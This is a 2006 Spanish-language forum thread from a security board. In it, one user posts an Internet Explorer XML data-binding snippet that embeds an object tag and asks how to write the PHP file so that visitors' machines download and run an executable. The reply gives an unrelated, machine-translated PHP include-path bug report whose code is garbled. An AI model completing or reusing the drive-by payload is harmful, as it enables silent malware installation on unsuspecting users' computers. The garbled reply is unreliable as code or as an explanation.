elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 02:08  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  fallo Object data
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: fallo Object data  (Leído 1,077 veces)
redired

Desconectado Desconectado

Mensajes: 84


-=R-E-D-I-R-E-D=-


Ver Perfil
fallo Object data
« en: 14 Enero 2006, 05:49 »

Estuve leyendo que con el sigueiente codigo
Código:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
  <security>
    <exploit>
      <![CDATA[
      <object id="oFile" data="xxx.php"></object>
      ]]>
    </exploit>
  </security>
</xml>
se puede crear ese xxx.php y va a permitir descargar en la maquina que ejecuta la web hasta un ejecutable y ejecutarlo, me interesaria saber si alguien conoce sobre el tema, como crear ese xxx.php
En línea
043h68

Desconectado Desconectado

Mensajes: 168


tururu....♫


Ver Perfil WWW
Re: fallo Object data
« Respuesta #1 en: 14 Enero 2006, 06:41 »

creo que es esto:
------------si introduces un script en un directorio  como '. / ' falla cuando IIS es configurado con un sitio virtual con el módulo ISAPI.

¡Esto trabaja bien con la instalación cgi!

Reproduce el código:
---------------¿---D:\wwwroot\a.php---<? php sistema ('cd');
incluya ('./b.php ');
?>------------------------
---D:\wwwroot\b.php---PRUEBA------------------------
==> http: // localhost/a.php
Resultado esperado:
----------------Con una instalación cgi:
D:\wwwroot PRUEBA

Resultado real:
--------------Con la instalación ISAPI:
C:\WINNT\system32 Advertencia: main (./b.php): fallo al abrir stream: no se encuentra el directorio en D:\wwwroot\a.php sobre línea 3
Advertencia: main (): fallo al abrir './b.php ' para inclusión (include_path = '.; c:\php\includes; c:\php\pear; c:\php; c:\php\font ') en D:\wwwroot\a.php sobre línea 3

espero que eso sea lo que buscabas xD
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Problema] HTML Object Library
Programación Visual Basic
sebah97 2 814 Último mensaje 17 Junio 2011, 23:43
por sebah97
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines